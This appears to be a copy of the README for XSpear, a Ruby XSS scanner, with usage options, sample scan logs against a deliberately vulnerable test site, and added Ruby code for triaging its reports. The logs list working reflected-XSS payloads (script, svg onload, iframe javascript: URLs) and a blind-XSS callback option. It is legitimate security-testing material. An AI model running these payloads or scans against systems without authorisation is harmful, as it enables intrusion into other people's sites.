XSpear - Powerfull XSS Scanning And Parameter Analysis Tool

XSpear is an XSS scanner distributed as a Ruby gem.

Key features
  • Pattern matching based XSS scanning
  • Detect alert/confirm/prompt events in a headless browser (with Selenium)
  • Testing request/response for XSS protection bypass and reflected params
    • Reflected Params
    • Filtered test: event handler, HTML tag, special char
  • Testing Blind XSS (with XSS Hunter, ezXSS, HBXSS, etc.; any URL-based blind test...)
  • Dynamic/Static Analysis
    • Find SQL error pattern
    • Analysis of security headers (CSP, HSTS, X-Frame-Options, XSS-Protection, etc.)
    • Analysis of other headers (Server version, Content-Type, etc.)
  • Scanning from raw file (Burp Suite, ZAP request)
  • XSpear running from Ruby code (with Gem library)
  • Show table-based CLI report with filtered rules, testing raw query (URL)
  • Testing at selected parameters
  • Support output format cli json
    • cli: summary, filtered rule (params), raw query
  • Support verbose level (quiet / normal / raw data)
  • Support custom callback code to test various attack vectors

Installation
Install it yourself as:
$ gem install XSpear
Or install it yourself as (local file):
$ gem install XSpear-{version}.gem
Add this line to your application's Gemfile:
gem 'XSpear'
And then execute:
$ bundle

Dependency gems
colorize selenium-webdriver terminal-table
If you configured it to install automatically in the Gem library but it behaves abnormally, install the dependencies with the following commands:
$ gem install colorize
$ gem install selenium-webdriver
$ gem install terminal-table

Usage on cli
Usage: xspear -u [target] -[options] [value]
[ e.g ]
$ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'

[ Options ]
    -u, --url=target_URL             [required] Target Url
    -d, --data=POST Body             [optional] POST Method Body data
        --headers=HEADERS            [optional] Add HTTP Headers
        --cookie=COOKIE              [optional] Add Cookie
        --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)
    -p, --param=PARAM                [optional] Test paramters
    -b, --BLIND=URL                  [optional] Add vector of Blind XSS
                                      + with XSS Hunter, ezXSS, HBXSS, etc...
                                      + e.g : -b https://hahwul.xss.ht
    -t, --threads=NUMBER             [optional] thread , default: 10
    -o, --output=FILENAME            [optional] Save JSON Result
    -v, --verbose=1~3                [optional] Show log depth
                                      + Default value: 2
                                      + v=1 : quiet mode
                                      + v=2 : show scanning log
                                      + v=3 : show special log(req/res)
    -h, --help                       Prints this help
        --version                    Show XSpear version
        --update                     Update with online

Result types
  • (I)NFO: Get information (e.g. SQL error, filtered rule, reflected params, etc.)
  • (V)UNL: Vulnerable XSS, alert/prompt/confirm confirmed with Selenium
  • (L)OW: Low level issue
  • (M)EDIUM: Medium level issue
  • (H)IGH: High level issue

Case by Case
Scanning XSS
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
json output
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1
detail log
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -v 3
set thread
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
testing at selected parameters
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test
testing blind xss
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht"
etc...

Sample log
Scanning XSS
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"
[ XSpear banner ] [ v1.0.7 ]
[*] creating a test query.
[*] test query generation is complete. [149 query]
[*] starting test and analysis. [10 threads]
[I] [00:37:34] reflected 'XsPeaR
[-] [00:37:34] 'cat' Not reflected |XsPeaR
[I] [00:37:34] [param: cat][Found SQL Error Pattern]
[-] [00:37:34] 'STATIC' not reflected
[I] [00:37:34] reflected "XsPeaR
[-] [00:37:34] 'cat' Not reflected ;XsPeaR
[I] [00:37:34] reflected `XsPeaR
...snip...
[H] [00:37:44] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code]
[-] [00:37:44] 'cat' not reflected <img/src onerror=alert(45)>
[-] [00:37:44] 'cat' not reflected <svg/onload=alert(45)>
[-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
[-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
[-] [00:37:50] 'cat' not found alert/prompt/confirm event <xmp><p title="XSpear - Powerfull XSS Scanning And Parameter Analysis Tool">
[-] [00:37:51] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
[V] [00:37:51] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>
               => [param: cat][triggered <script>alert(45)</script>]
[V] [00:37:51] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>
               => [param: cat][triggered <svg/onload=alert(45)>]
[*] finish scan. the report is being generated..

+----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
|                                                         [ XSpear report ]                                                        |
|                                         http://testphp.vulnweb.com/listproducts.php?cat=z                                        |
|                              2019-07-24 00:37:33 +0900 ~ 2019-07-24 00:37:51 +0900 Found 12 issues.                              |
+----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
| NO | TYPE  | ISSUE            | METHOD | PARAM | PAYLOAD                             | DESCRIPTION                                |
+----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
| 0  | INFO  | DYNAMIC ANALYSIS | GET    | cat   | XsPeaR"                             | Found SQL Error Pattern                    |
| 1  | INFO  | STATIC ANALYSIS  | GET    | -     | original query                      | Found Server: nginx/1.4.1                  |
| 2  | INFO  | STATIC ANALYSIS  | GET    | -     | original query                      | Not Set HSTS                               |
| 3  | INFO  | STATIC ANALYSIS  | GET    | -     | original query                      | Content-Type: text/html                    |
| 4  | LOW   | STATIC ANALYSIS  | GET    | -     | original query                      | Not Set X-Frame-Options                    |
| 5  | MIDUM | STATIC ANALYSIS  | GET    | -     | original query                      | Not Set CSP                                |
| 6  | INFO  | REFLECTED        | GET    | cat   | rEfe6                               | reflected parameter                        |
| 7  | INFO  | FILERD RULE      | GET    | cat   | onhwul=64                           | not filtered event handler on{any} pattern |
| 8  | HIGH  | XSS              | GET    | cat   | <script>alert(45)</script>          | reflected XSS Code                         |
| 9  | HIGH  | XSS              | GET    | cat   | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code                         |
| 10 | VULN  | XSS              | GET    | cat   | <script>alert(45)</script>          | triggered <script>alert(45)</script>       |
| 11 | VULN  | XSS              | GET    | cat   | '"><svg/onload=alert(45)>           | triggered <svg/onload=alert(45)>           |
+----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
< Available Objects >
[cat] param
  + Available Special Char: ' \ ` ) [ } : . { ] $
  + Available Event Handler: "onActivate","onBeforeActivate","onAfterUpdate","onAbort","onAfterPrint","onBeforeCopy","onBeforeCut","onBeforePaste","onBlur","onBeforePrint","onBeforeDeactivate","onBeforeUpdate","onBeforeEditFocus","onBegin","onBeforeUnload","onBounce","onDataSetChanged","onCellChange","onClick","onDataAvailable","onChange","onContextMenu","onCopy","onControlSelect","onDataSetComplete","onCut","onDragStart","onDragEnter","onDragOver","onDblClick","onDragEnd","onDrop","onDeactivate","onDragLeave","onDrag","onDragDrop","onHashChange","onFocusOut","onFilterChange","onEnd","onFocus","onHelp","onErrorUpdate","onFocusIn","onFinish","onError","onLayoutComplete","onKeyDown","onKeyUp","onMediaError","onLoad","onMediaComplete","onInput","onKeyPress","onloadstart","onLoseCapture","onMouseOut","onMouseDown","onMouseWheel","onMove","onMouseLeave","onMessage","onMouseEnter","onMouseMove","onMouseOver","onMouseUp","onPropertyChange","onMoveStart","onProgress","onPopState","onPaste","onOnline","onMoveEnd","onPause","onOutOfSync","onOffline","onReverse","onResize","onRedo","onRowsEnter","onRepeat","onReset","onResizeEnd","onResizeStart","onReadyStateChange","onResume","onRowInserted","onStart","onScroll","onRowExit","onSelectionChange","onSeek","onStop","onRowDelete","onSelectStart","onSelect","ontouchstart","ontouchend","onTrackChange","onSyncRestored","onTimeError","onUndo","onURLFlip","onStorage","onUnload","onSubmit","ontouchmove"
  + Available HTML Tag: "meta","video","iframe","embed","script","audio","svg","object","img","frameset","applet","style","frame"
  + Available Useful Code: "document.cookie","document.location","window.location"
< Raw Query >
[0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22
[1] http://testphp.vulnweb.com/listproducts.php?cat=z?-
[2] http://testphp.vulnweb.com/listproducts.php?cat=z?-
[3] http://testphp.vulnweb.com/listproducts.php?cat=z?-
[4] http://testphp.vulnweb.com/listproducts.php?cat=z?-
[5] http://testphp.vulnweb.com/listproducts.php?cat=z?-
[6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6
[7] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E
[8] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
[9] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E
[10] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
[11] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3E
to JSON
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1
{"starttime":"2019-07-17 01:02:13 +0900","endtime":"2019-07-17 01:02:59 +0900","issue_count":24,"issue_list":[{"id":0,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yy%3CXsPeaR","description":"not filtered \u001b[0;34;49m<\u001b[0m"},{"id":1,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%27","description":"not filtered \u001b[0;34;49m'\u001b[0m"},{"id":2,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3E","description":"not filtered \u001b[0;34;49m>\u001b[0m"},{"id":3,"type":"INFO","issue":"REFLECTED","payload":"searchFor=yyrEfe6","description":"reflected parameter"},{"id":4,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%22","description":"not filtered \u001b[0;34;49m\"\u001b[0m"},{"id":5,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%60","description":"not filtered \u001b[0;34;49m`\u001b[0m"},{"id":6,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3B","description":"not filtered \u001b[0;34;49m;\u001b[0m"},{"id":7,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%28","description":"not filtered \u001b[0;34;49m(\u001b[0m"},{"id":8,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%7C","description":"not filtered \u001b[0;34;49m|\u001b[0m"},{"id":9,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%29","description":"not filtered \u001b[0;34;49m)\u001b[0m"},{"id":10,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%7B","description":"not filtered \u001b[0;34;49m{\u001b[0m"},{"id":11,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%5B","description":"not filtered \u001b[0;34;49m[\u001b[0m"},{"id":12,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%5D","description":"not filtered \u001b[0;34;49m]\u001b[0m"},{"id":13,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%7D","description":"not filtered \u001b[0;34;49m}\u001b[0m"},{"id":14,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3A","description":"not filtered \u001b[0;34;49m:\u001b[0m"},{"id":15,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%2B","description":"not filtered \u001b[0;34;49m+\u001b[0m"},{"id":16,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR.","description":"not filtered \u001b[0;34;49m.\u001b[0m"},{"id":17,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR-","description":"not filtered \u001b[0;34;49m-\u001b[0m"},{"id":18,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%2C","description":"not filtered \u001b[0;34;49m,\u001b[0m"},{"id":19,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3D","description":"not filtered \u001b[0;34;49m=\u001b[0m"},{"id":20,"type":"HIGH","issue":"XSS","payload":"searchFor=yy%3Cimg%2Fsrc+onerror%3Dalert%2845%29%3E","description":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},{"id":21,"type":"HIGH","issue":"XSS","payload":"searchFor=yy%3Csvg%2Fonload%3Dalert%2845%29%3E","description":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},{"id":22,"type":"HIGH","issue":"XSS","payload":"searchFor=yy%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E","description":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},{"id":23,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%24","description":"not filtered \u001b[0;34;49m$\u001b[0m"}]}
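The JSON report above is what you would feed into a ticketing or CI step, and it has one trap worth knowing about: the description strings carry the same ANSI colour codes as the terminal output (the \u001b[...m sequences). The following is an added example, not part of XSpear or its README, that strips those codes and reduces a report to a triage summary: issue counts per severity, which special characters the target reflected unfiltered, and the payloads Selenium actually triggered (type VULN). The embedded report is a constructed subset using the page's field names, not a real scan result.

```ruby
require 'json'
require 'uri'

# Constructed sample in the shape of XSpear's "-o json" output (same field
# names as the report above; entries are a hand-picked subset, not a real scan).
SAMPLE_REPORT = <<~'JSON'
  {"starttime":"2019-07-17 01:02:13 +0900","endtime":"2019-07-17 01:02:59 +0900","issue_count":5,"issue_list":[
    {"id":0,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yy%3CXsPeaR","description":"not filtered \u001b[0;34;49m<\u001b[0m"},
    {"id":1,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%27","description":"not filtered \u001b[0;34;49m'\u001b[0m"},
    {"id":2,"type":"INFO","issue":"REFLECTED","payload":"searchFor=yyrEfe6","description":"reflected parameter"},
    {"id":3,"type":"HIGH","issue":"XSS","payload":"searchFor=yy%3Csvg%2Fonload%3Dalert%2845%29%3E","description":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},
    {"id":4,"type":"VULN","issue":"XSS","payload":"searchFor=yy%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E","description":"triggered <script>alert(45)</script>"}
  ]}
JSON

# The JSON descriptions carry terminal colour codes (the \u001b[...m sequences
# visible in the report); strip them before comparing or storing descriptions.
ANSI_RE = /\e\[[0-9;]*m/

def strip_ansi(text)
  text.gsub(ANSI_RE, '')
end

# Reduce a report to what a triager needs: counts per severity, the special
# characters the target reflected unfiltered, and the payloads Selenium
# actually triggered (type VULN), URL-decoded for readability.
def summarize(report_json)
  report = JSON.parse(report_json)
  issues = report.fetch('issue_list')
  by_type = issues.group_by { |i| i['type'] }.transform_values(&:size)
  unfiltered = issues.select { |i| i['issue'] == 'FILERD RULE' }
                     .map { |i| strip_ansi(i['description']).sub('not filtered ', '') }
  confirmed = issues.select { |i| i['type'] == 'VULN' }
                    .map { |i| URI.decode_www_form_component(i['payload']) }
  {
    'window' => [report['starttime'], report['endtime']],
    'count' => report['issue_count'],
    'by_type' => by_type,
    'unfiltered_chars' => unfiltered,
    'confirmed' => confirmed
  }
end

# A report needs a human to look at it when anything reached HIGH or VULN.
def needs_attention?(summary)
  summary['by_type'].any? { |type, n| %w[HIGH VULN].include?(type) && n > 0 }
end

if __FILE__ == $PROGRAM_NAME
  s = summarize(SAMPLE_REPORT)
  puts "#{s['count']} issues between #{s['window'].join(' and ')}"
  s['by_type'].each { |t, n| puts "  #{t}: #{n}" }
  puts "unfiltered characters: #{s['unfiltered_chars'].join(' ')}"
  s['confirmed'].each { |p| puts "confirmed: #{p}" }
  puts(needs_attention?(s) ? 'ACTION REQUIRED' : 'no confirmed XSS')
end
```

Run it with the file produced by "-o json" in place of SAMPLE_REPORT. Keeping the HIGH (reflected, unverified) and VULN (browser-confirmed) counts separate matters for triage: a HIGH entry means the payload came back in the body, while only VULN entries were seen to execute in Selenium.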

Usage on ruby code (gem library)
require 'XSpear'

# Set options
options = {}
options['thread'] = 30
options['cookie'] = "data=123"
options['blind'] = "https://hahwul.xss.ht"
options['output'] = 'json'

# Create XSpear object with url, options
s = XspearScan.new "https://www.hahwul.com?target_url", options

# Scanning
s.run
result = s.report.to_json
r = JSON.parse result

Add Scanning Module
1) Add makeQueryPattern
makeQueryPattern('type', 'query,', 'pattern', 'category', "description", "callback function")
# type: f(ilterd?) r(eflected?) x(ss?)
# category: i(nfo) v(uln) l(ow) m(edium) h(igh)

# e.g
# makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', "not filtered "+",".blue, CallbackStringMatch)

2) For another callback, write a callback class that overrides ScanCallbackFunc, e.g.
class CallbackStringMatch < ScanCallbackFunc
  def run
    if @response.body.include? @query
      [true, "reflected #{@query}"]
    else
      [false, "not reflected #{@query}"]
    end
  end
end

Parent class (ScanCallbackFunc)
class ScanCallbackFunc
  def initialize(url, method, query, response)
    @url = url
    @method = method
    @query = query
    @response = response
    # self.run
  end

  def run
    # override
  end
end
Common Callback Class
  • CallbackXSSSelenium
  • CallbackErrorPatternMatch
  • CallbackCheckHeaders
  • CallbackStringMatch
  • CallbackNotAdded etc...
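The callback contract above is small: the constructor receives url, method, query and response, and run returns a two-element array, a boolean saying whether the pattern matched and a description for the report. The following is an added example, not XSpear's own code, of two callbacks written against that contract: one flags missing security headers (the static-analysis rows the report table shows as "Not Set HSTS" / "Not Set CSP" / "Not Set X-Frame-Options"), the other decides whether a marker plus a special character came back unencoded (the idea behind the FILERD RULE rows). ScanCallbackFunc is redefined here only as a stand-in so the file runs without the gem, FakeResponse is a hypothetical minimal stand-in for an HTTP response, and the sample URL and body are constructed.

```ruby
# Stand-in with the same constructor shape as the ScanCallbackFunc shown
# above; with the gem loaded you would subclass the real class instead.
class ScanCallbackFunc
  def initialize(url, method, query, response)
    @url = url
    @method = method
    @query = query
    @response = response
  end

  def run
    raise NotImplementedError, 'override run in a subclass'
  end
end

# Hypothetical minimal response object: only #body and case-insensitive
# header lookup via #[] are used below.
FakeResponse = Struct.new(:body, :headers) do
  def [](name)
    headers.find { |k, _| k.casecmp?(name) }&.last
  end
end

# Callback 1: report which of the expected security headers are absent.
# true means "issue found", matching CallbackStringMatch's convention.
class CallbackSecurityHeaders < ScanCallbackFunc
  REQUIRED = ['Content-Security-Policy', 'Strict-Transport-Security', 'X-Frame-Options'].freeze

  def run
    missing = REQUIRED.reject { |h| @response[h] }
    if missing.empty?
      [false, 'all expected security headers present']
    else
      [true, "Not Set #{missing.join(', ')}"]
    end
  end
end

# Callback 2: the query is a marker followed by one special character
# (e.g. 'XsPeaR<'); it is "not filtered" only if it appears verbatim in
# the body. An HTML-encoded echo (XsPeaR&lt;) does not match, which is
# exactly the case where the application's output encoding is doing its job.
class CallbackSpecialChar < ScanCallbackFunc
  def run
    if @response.body.include?(@query)
      [true, "not filtered #{@query[-1]}"]
    else
      [false, "filtered #{@query[-1]}"]
    end
  end
end

# Run a list of [callback class, query] pairs against one response and keep
# only the hits, the way the report table keeps only matched patterns.
def collect_findings(url, response, callbacks)
  callbacks.map { |klass, query| [klass.name, *klass.new(url, 'GET', query, response).run] }
           .select { |_, hit, _| hit }
           .map { |name, _, desc| { 'callback' => name, 'description' => desc } }
end

# Constructed sample: the server echoes "<" raw but HTML-encodes the quote,
# and sends X-Frame-Options without CSP or HSTS.
SAMPLE_URL = 'http://example.test/search.php?q=XsPeaR'
SAMPLE_RESPONSE = FakeResponse.new(
  '<html><body>Results for: XsPeaR< and XsPeaR&quot; none</body></html>',
  { 'Content-Type' => 'text/html', 'X-Frame-Options' => 'DENY' }
)

def demo_findings
  collect_findings(SAMPLE_URL, SAMPLE_RESPONSE, [
    [CallbackSecurityHeaders, '-'],
    [CallbackSpecialChar, 'XsPeaR<'],
    [CallbackSpecialChar, 'XsPeaR"']
  ])
end

if __FILE__ == $PROGRAM_NAME
  demo_findings.each { |f| puts "[#{f['callback']}] #{f['description']}" }
end
```

The query passed to a callback is whatever makeQueryPattern was registered with, so a header check that does not depend on the query can be registered with a placeholder such as '-' (the report table above shows exactly that for its STATIC ANALYSIS rows).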

Update
if normal user
$ gem update XSpear
if developer (soft)
$ git pull -v
if developer (hard)
$ git reset --hard HEAD; git pull -v

Development
After checking out the repo, run bin/setup to install dependencies. Then, run rake spec to run the tests. You can also run bin/console for an interactive prompt that will allow you to experiment.
To install this gem onto your local machine, run bundle exec rake install. To release a new version, update the version number in version.rb, and then run bundle exec rake release, which will create a git tag for the version, push git commits and tags, and push the .gem file to rubygems.org.

Contributing
Bug reports and pull requests are welcome on GitHub at https://github.com/hahwul/XSpear. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the Contributor Covenant code of conduct.

Code of Conduct
Everyone interacting in the XSpear project's codebases, issue trackers, chat rooms and mailing lists is expected to follow the code of conduct.

ScreenShot (images not included in this copy)
Source: https://mederc.blogspot.com/2013/05/xspear-powerfull-xss-scanning-as-well.html